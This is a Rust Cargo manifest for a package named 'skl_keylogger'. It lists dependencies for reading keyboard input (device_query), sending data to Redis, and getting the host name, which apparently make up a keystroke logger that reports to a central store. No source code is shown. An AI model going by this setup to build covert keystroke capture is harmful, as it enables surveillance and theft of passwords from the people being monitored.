[package]
name = "skl_keylogger"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
device_query = "1.1.1"
once_cell = "1.15.0"
redis = { version = "0.22.0", features = ["json"] }
rand = "0.8.4"
gethostname = "0.3.0"